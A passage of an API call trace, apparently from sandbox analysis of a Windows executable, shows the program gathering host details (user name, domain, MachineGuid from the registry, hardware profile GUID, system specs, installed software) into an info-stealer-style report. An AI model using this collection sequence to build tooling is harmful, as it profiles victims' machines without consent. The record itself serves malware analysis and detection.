23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB" [0235.097] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB", lpString2="\n" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\n") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\n" [0235.097] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\n", lpString2="User name: " | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: ") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: " [0235.097] GetProcessHeap () returned 0x6b0000 [0235.097] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x104) returned 0x724ec8 [0235.097] GetUserNameA (in: lpBuffer=0x724ec8, pcbBuffer=0x1987c4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1987c4) returned 1 [0235.101] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: ", lpString2="RDhJ0CNFevzX" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX" [0235.101] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX", lpString2="\n" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\n") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\n" [0235.101] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\n", lpString2="Domain name: " | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: " [0235.101] DsRoleGetPrimaryDomainInformation (in: lpServer=0x0, InfoLevel=0x1, Buffer=0x1987c0 | out: Buffer=0x1987c0*=0x7005f0*(MachineRole=0x0, Flags=0x0, DomainNameFlat="WORKGROUP", DomainNameDns=0x0, DomainForestName=0x0, DomainGuid.Data1=0x0, DomainGuid.Data2=0x0, DomainGuid.Data3=0x0, DomainGuid.Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x0 [0235.105] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ", lpString2="?" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?" [0235.105] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?", lpString2="\n" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\n") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\n" [0235.105] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\n", lpString2="MachineID: " | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: ") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: " [0235.106] GetProcessHeap () returned 0x6b0000 [0235.106] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x104) returned 0x7244f0 [0235.106] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Cryptography", ulOptions=0x0, samDesired=0x20119, phkResult=0x1987c4 | out: phkResult=0x1987c4*=0x380) returned 0x0 [0235.106] RegQueryValueExA (in: hKey=0x380, lpValueName="MachineGuid", lpReserved=0x0, lpType=0x0, lpData=0x7244f0, lpcbData=0x1987c0*=0xff | out: lpType=0x0, lpData=0x7244f0*=0x30, lpcbData=0x1987c0*=0x25) returned 0x0 [0235.106] RegCloseKey (hKey=0x380) returned 0x0 [0235.106] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: ", lpString2="03845cb8-7441-4a2f-8c0f-c90408af5778" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778" [0235.106] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778", lpString2="\n" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\n") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\n" [0235.107] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\n", lpString2="GUID: " | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: ") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: " [0235.108] GetCurrentHwProfileA (in: lpHwProfileInfo=0x198748 | out: lpHwProfileInfo=0x198748) returned 1 [0235.114] GetProcessHeap () returned 0x6b0000 [0235.114] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x64) returned 0x6f0748 [0235.115] lstrcatA (in: lpString1="", lpString2="{c20d559d-6c9d-11eb-b0a3-806e6f6e6963}" | out: lpString1="{c20d559d-6c9d-11eb-b0a3-806e6f6e6963}") returned="{c20d559d-6c9d-11eb-b0a3-806e6f6e6963}" [0235.115] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: ", lpString2="{c20d559d-6c9d-11eb-b0a3-806e6f6e6963}" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}" [0235.115] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}", lpString2="\n\n" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\n") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\n" [0235.115] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\n", lpString2="Installed Software: " | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: ") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 